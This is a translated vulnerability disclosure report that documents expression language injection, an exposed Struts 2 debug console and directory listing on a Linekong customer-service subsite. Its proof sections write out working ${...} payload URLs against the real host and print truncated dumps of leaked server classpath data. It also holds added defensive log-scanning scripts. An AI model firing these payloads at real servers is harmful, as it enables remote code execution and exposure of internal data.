Vulnerability summary

Bug ID: wooyun-2015-0122286

Title: Expression language injection and remote command execution on a Linekong (蓝港在线) subsite

Vendor: linekong.com

Author: Ysql404

Submitted: 2015-06-23 19:35

Fixed: 2015-07-01 10:03

Disclosed: 2015-07-01 10:03

Type: Command execution

Severity: High

Self-assessed rank: 15

Status: Fixed by vendor

Source: http://www.wooyun.org


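Vulnerability details

Disclosure status:

2015-06-23: Details reported to the vendor; awaiting vendor response
2015-06-24: Vendor confirmed; details disclosed to the vendor only
2015-07-01: Vendor fixed the vulnerability and proactively disclosed it; details released to the public

Brief description:

Expression language injection and remote command execution on a Linekong (蓝港在线) subsite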

Detailed description:

Site: http://kefu.linekong.com
Expression language injection references:
WooYun: Expression language injection on a Dianping (大众点评) site
WooYun: Expression language injection on the Hangzhou Human Resources and Social Security website (exploitable)
1. Expression language injection
URL 1: http://kefu.linekong.com/eService/system/inputLogin.do?gameId=${99337-10246}&gameMainId=4
Test result:

[Screenshot: QQ图片20150623144319.png]


Open this URL and view the page source: http://kefu.linekong.com/eService/system/inputLogin.do?gameId=${application}&gameMainId=4


URL 2: http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=${100167-11126}
Test result:

[Screenshot: QQ图片20150623144930.png]


Open this URL and view the page source: http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=4${application}
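
A defender-side check for the two probes above, as an added example that is not part of the original report: it scans access-log lines for expression delimiters in query parameters (undoing single or double URL encoding) and tells an evaluated arithmetic probe from a merely reflected one in a response body. The log lines, IP addresses, response bodies and the scope-object watch-list are constructed for illustration.

```python
import re
from urllib.parse import unquote

# ${...}, #{...} and %{...} are expression delimiters in JSP EL, OGNL and Struts2 tags.
EXPR = re.compile(r"[$#%]\{([^{}]*)\}")
ARITH = re.compile(r"^\s*(\d+)\s*([-+*])\s*(\d+)\s*$")
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumed watch-list of scope/implicit object names; `application` is the one used on the page.
SCOPE_OBJECTS = {"application", "session", "request", "applicationScope",
                 "sessionScope", "requestScope", "pageContext"}

# Constructed access-log lines (combined-log style) for the endpoint named in the report.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Jun/2015:14:40:00 +0800] "GET /eService/system/inputLogin.do?gameId=10&gameMainId=4 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Jun/2015:14:43:00 +0800] "GET /eService/system/inputLogin.do?gameId=%24%7B99337-10246%7D&gameMainId=4 HTTP/1.1" 200 5125',
    '198.51.100.7 - - [23/Jun/2015:14:45:00 +0800] "GET /eService/system/inputLogin.do?gameId=10&gameMainId=4%24%7Bapplication%7D HTTP/1.1" 200 20480',
    '198.51.100.7 - - [23/Jun/2015:14:49:00 +0800] "GET /eService/system/inputLogin.do?gameId=10&gameMainId=%2524%257B100167-11126%257D HTTP/1.1" 200 5125',
]
# Constructed response bodies: one where the expression was evaluated, one where it was only echoed.
EVALUATED_BODY = '<img src="/eService/system/generateRandomcode.do?gameId=89091&gameMainId=4">'
REFLECTED_BODY = '<img src="/eService/system/generateRandomcode.do?gameId=%24%7B99337-10246%7D&gameMainId=4">'


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded delimiters are still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def query_params(target):
    """Yield (name, decoded value) pairs; split by hand so a raw '#' or '+' is preserved."""
    for pair in target.partition("?")[2].split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield unquote(name), fully_decode(value)


def classify(expr):
    """Label an expression body as an arithmetic probe, a scope-object read, or other."""
    if ARITH.match(expr):
        return "arithmetic-probe"
    root = re.split(r"[.\[( ]", expr.strip(), maxsplit=1)[0].lstrip("#")
    return "scope-object" if root in SCOPE_OBJECTS else "expression"


def scan_log_line(line):
    """Return [(parameter, expression, kind)] for every expression found in the query string."""
    match = REQUEST_LINE.search(line)
    if not match:
        return []
    return [(name, expr, classify(expr))
            for name, value in query_params(match.group(1))
            for expr in EXPR.findall(value)]


def arithmetic_result(expr):
    """Compute 'a op b' without eval(); None if the expression is not simple arithmetic."""
    match = ARITH.match(expr)
    if not match:
        return None
    a, op, b = int(match.group(1)), match.group(2), int(match.group(3))
    return {"-": a - b, "+": a + b, "*": a * b}[op]


def evaluated_in_response(expr, body):
    """True when the body carries the computed result and not the literal expression."""
    result = arithmetic_result(expr)
    if result is None:
        return False
    return str(result) in body and expr not in fully_decode(body)


if __name__ == "__main__":
    for number, line in enumerate(SAMPLE_LOG, start=1):
        for finding in scan_log_line(line):
            print(number, *finding)
    print("evaluated:", evaluated_in_response("99337-10246", EVALUATED_BODY))
    print("reflected only:", not evaluated_in_response("99337-10246", REFLECTED_BODY))
```

A hit from `scan_log_line` only shows that someone sent an expression; `evaluated_in_response` is what separates a vulnerable endpoint from one that echoes the parameter unchanged.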

2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fantlr-2.7.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fgnu-regexp.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-pell-multipart-plugin-2.0.11.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5900502660985595292catalina-optional.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-fileupload-1.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-transaction.jar%2C+org.apache.catalina.WELCOME_FILES%3D%5BLjava.lang.String%3B%40114d662%2C+org.apache.catalina.resources%3Dorg.apache.naming.resources.ProxyDirContext%40106c6be%7D"


2. Remote command execution vulnerability
WooYun: Remote command execution vulnerability on a Dianping subsite (2)
URL: http://kefu.linekong.com/eService/struts/webconsole.html

QQ图片20150623145742.png


3. Arbitrary directory access
http://kefu.linekong.com/eService/css/
http://kefu.linekong.com/eService/download/
http://kefu.linekong.com/eService/images/
http://kefu.linekong.com/eService/js/

QQ图片20150623150147.png
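Each of the three findings above leaves a recognizable trace in web access logs. The following is an added example (not part of the original report): a Python triage script that flags expression delimiters in query parameters, requests for the Struts debug console, and bare requests for the static directories named above. The log format, the sample lines and the rule names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed access-log lines (common log format); not taken from the affected server.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Jun/2015:14:43:19 +0800] "GET /eService/system/inputLogin.do?gameId=%24%7B99337-10246%7D&gameMainId=4 HTTP/1.1" 200 5120
203.0.113.7 - - [23/Jun/2015:14:49:30 +0800] "GET /eService/system/inputLogin.do?gameId=10&gameMainId=4${application} HTTP/1.1" 200 48211
203.0.113.7 - - [23/Jun/2015:14:57:42 +0800] "GET /eService/struts/webconsole.html HTTP/1.1" 200 2048
203.0.113.7 - - [23/Jun/2015:15:01:47 +0800] "GET /eService/download/ HTTP/1.1" 200 1374
198.51.100.20 - - [23/Jun/2015:15:02:10 +0800] "GET /eService/system/inputLogin.do?gameId=10&gameMainId=4 HTTP/1.1" 200 5101
198.51.100.20 - - [23/Jun/2015:15:02:11 +0800] "GET /eService/css/main.css HTTP/1.1" 200 900
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# ${...} and #{...} are JSP/unified EL delimiters; %{...} is the Struts 2 OGNL form.
EL_DELIM = re.compile(r'[$#%]\{')
# Static directories named in the report; adjust to the application's own layout.
LISTING_DIRS = {"css", "download", "images", "js"}
CONSOLE_SUFFIX = "/struts/webconsole.html"


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so a double-encoded ${ (%2524%257B) is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line):
    """Return a list of (rule, detail) findings for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    # Split by hand so a raw '#{' is not swallowed as a URL fragment.
    raw_path, _, query = m["target"].partition("?")
    path = fully_decode(raw_path)

    # Rule 1: expression delimiters in any parameter name or value.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if EL_DELIM.search(fully_decode(name)) or EL_DELIM.search(fully_decode(value)):
            findings.append(("el-expression", name))

    # Rule 2: the Struts 2 debugging console should never be reachable in production.
    if path.lower().endswith(CONSOLE_SUFFIX):
        findings.append(("struts-webconsole", path))

    # Rule 3: a bare request for a static directory answered with 200
    # suggests directory listing is enabled and is worth a manual check.
    segments = [s for s in path.split("/") if s]
    if (path.endswith("/") and not query and m["status"] == "200"
            and segments and segments[-1] in LISTING_DIRS):
        findings.append(("directory-request", path))
    return findings


def scan(log_text):
    """Return (line_number, client_ip, rule, detail) for every finding in the log."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        for rule, detail in inspect_line(line):
            ip = LOG_RE.match(line)["ip"]
            hits.append((number, ip, rule, detail))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```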

Proof of vulnerability:

Site: http://kefu.linekong.com
1. Expression language injection
URL 1: http://kefu.linekong.com/eService/system/inputLogin.do?gameId=${99337-10246}&gameMainId=4
Test result:

QQ图片20150623144319.png


Open this URL and view the page source: http://kefu.linekong.com/eService/system/inputLogin.do?gameId=${application}&gameMainId=4



URL 2: http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=${100167-11126}
Test result:

QQ图片20150623144930.png


Open this URL and view the page source: http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=4${application}

ice%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp7318690147406926801jboss-ha-local-jdbc.rar-contents%2Fjboss-ha-local-jdbc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjboss-hibernate.deployer%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Factivation.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjnpserver.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fscheduler-plugin-example.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-jaxrpc.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-core-2.0.11.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fdeploy%2Fjbossweb-tomcat55.sar%2FROOT.war%2F%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-saaj.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Fconf%2F%3A%2Fusr%2Fjava%2Fjdk1.6.0_25%2Flib%2Ftools.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjbossmq.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp6144956477623102918catalina-manager.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp8301739402364757125tomcat-util.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fscout.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fproperties-plugin.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp3285496549751174622jboss-aspect-library.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjavax.servlet.jsp.jar%3A%2Fhome%2Fjboss%2FeService%
2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fantlr-2.7.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Flib%2Fgnu-regexp.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fstruts2-pell-multipart-plugin-2.0.11.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5900502660985595292catalina-optional.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Ftmp%2Fdeploy%2Ftmp5444757958600115764eService.war%2FWEB-INF%2Flib%2Fcommons-fileupload-1.2.jar%3A%2Fhome%2Fjboss%2FeService%2Fjboss-4.0.2%2Fserver%2Fdefault%2Flib%2Fjboss-transaction.jar%2C+org.apache.catalina.WELCOME_FILES%3D%5BLjava.lang.String%3B%40114d662%2C+org.apache.catalina.resources%3Dorg.apache.naming.resources.ProxyDirContext%40106c6be%7D"


2. Remote command execution vulnerability
URL: http://kefu.linekong.com/eService/struts/webconsole.html

[Screenshot: QQ图片20150623145742.png]


3. Arbitrary directory access
http://kefu.linekong.com/eService/css/
http://kefu.linekong.com/eService/download/
http://kefu.linekong.com/eService/images/
http://kefu.linekong.com/eService/js/

[Screenshot: QQ图片20150623150147.png]
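For defenders reviewing their own access logs, the three request patterns in this report (an expression delimiter in a parameter, a served `/struts/webconsole.html`, and a 200 response on a bare static directory) can be flagged with a short scan. This is an added example, not part of the original report; the log lines are constructed samples in combined log format, and the finding labels are hypothetical names.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (combined log format); not taken from the report.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Jun/2015:14:43:19 +0800] "GET /eService/system/inputLogin.do?gameId=%24%7B99337-10246%7D&gameMainId=4 HTTP/1.1" 200 5120
203.0.113.7 - - [23/Jun/2015:14:57:42 +0800] "GET /eService/struts/webconsole.html HTTP/1.1" 200 2048
203.0.113.7 - - [23/Jun/2015:15:01:47 +0800] "GET /eService/download/ HTTP/1.1" 200 913
198.51.100.9 - - [23/Jun/2015:15:02:10 +0800] "GET /eService/system/inputLogin.do?gameId=12&gameMainId=4 HTTP/1.1" 200 5090
198.51.100.9 - - [23/Jun/2015:15:02:11 +0800] "GET /eService/css/main.css HTTP/1.1" 200 700
198.51.100.9 - - [23/Jun/2015:15:02:12 +0800] "GET /eService/images/ HTTP/1.1" 403 120
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
EL_RE = re.compile(r'[$#%]\{[^}]*\}')  # ${...}, #{...}, %{...} expression delimiters
STATIC_DIRS = ("/css/", "/download/", "/images/", "/js/")  # directories named in the report

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded delimiters are still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (client, finding) for a suspicious request, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None  # not a parseable access-log line
    client, _method, target, status = m.groups()
    parts = urlsplit(target)
    path = decode(parts.path)
    if EL_RE.search(decode(parts.query)):
        return client, "expression-in-parameter"
    if path.lower().endswith("/struts/webconsole.html") and status == "200":
        return client, "struts-webconsole-served"
    if status == "200" and path.endswith(STATIC_DIRS):
        return client, "directory-index-200"  # candidate: may be a welcome file
    return None

def scan(log_text):
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for client, finding in scan(SAMPLE_LOG):
        print(client, finding)
```

In Struts 2 the debugging interceptor behind the console is only active when `struts.devMode` is enabled, so a `struts-webconsole-served` hit is a prompt to check that setting on the affected application.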

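Remediation:

Copyright notice: when reposting, please credit the source Ysql404@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-06-24 12:53

Vendor reply:

Thank you for pointing out the issue; it has been handed over to the developers to handle.

Latest status:

2015-07-01: Restored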